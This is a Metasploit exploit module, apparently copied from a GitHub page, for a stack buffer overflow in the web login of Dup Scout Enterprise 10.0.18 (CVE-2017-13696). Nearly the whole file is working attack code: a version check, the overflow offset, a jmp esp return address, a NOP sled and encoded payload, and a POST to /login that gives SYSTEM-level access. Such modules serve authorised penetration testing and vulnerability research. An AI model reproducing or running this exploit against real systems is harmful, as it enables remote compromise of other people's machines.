Permalink
Cannot retrieve contributors at this time
## | |
# This module requires Metasploit: https://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
class MetasploitModule < Msf::Exploit::Remote | |
Rank = ExcellentRanking | |
include Msf::Exploit::Remote::HttpClient | |
def initialize(info = {}) | |
super(update_info(info, | |
'Name' => 'Dup Scout Enterprise Login Buffer Overflow', | |
'Description' => %q{ | |
This module exploits a stack buffer overflow in Dup Scout Enterprise | |
10.0.18. The buffer overflow exists via the web interface during | |
login. This gives NT AUTHORITY\SYSTEM access. | |
}, | |
'License' => MSF_LICENSE, | |
'Author' => | |
[ | |
'Chris Higgins', # msf Module -- @ch1gg1ns | |
'sickness' # Original discovery | |
], | |
'References' => | |
[ | |
[ 'CVE', '2017-13696' ], | |
[ 'EDB', '43145' ] | |
], | |
'DefaultOptions' => | |
{ | |
'EXITFUNC' => 'thread' | |
}, | |
'Platform' => 'win', | |
'Payload' => | |
{ | |
'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d" | |
}, | |
'Targets' => | |
[ | |
[ 'Dup Scout Enterprise 10.0.18', | |
{ | |
'Ret' => 0x10090c83, # jmp esp - libspp.dll | |
'Offset' => 780 | |
} | |
], | |
], | |
'Privileged' => true, | |
'DisclosureDate' => '2017-11-14', | |
'DefaultTarget' => 0)) | |
register_options([Opt::RPORT(80)]) | |
end | |
def check | |
res = send_request_cgi({ | |
'uri' => '/', | |
'method' => 'GET' | |
}) | |
if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/ | |
return Exploit::CheckCode::Appears | |
end | |
return Exploit::CheckCode::Safe | |
end | |
def exploit | |
connect | |
print_status("Generating exploit...") | |
evil = rand_text(target['Offset']) | |
evil << [target.ret].pack('V') | |
evil << make_nops(12) | |
evil << payload.encoded | |
evil << make_nops(10000 - evil.length) | |
vprint_status("Evil length: " + evil.length.to_s) | |
sploit = "username=" | |
sploit << evil | |
sploit << "&password=" | |
sploit << rand_text(evil.length) | |
sploit << "\r\n" | |
print_status("Triggering the exploit now...") | |
res = send_request_cgi({ | |
'uri' => '/login', | |
'method' => 'POST', | |
'content-type' => 'application/x-www-form-urlencoded', | |
'content-length' => '17000', | |
'data' => sploit | |
}) | |
handler | |
disconnect | |
end | |
end |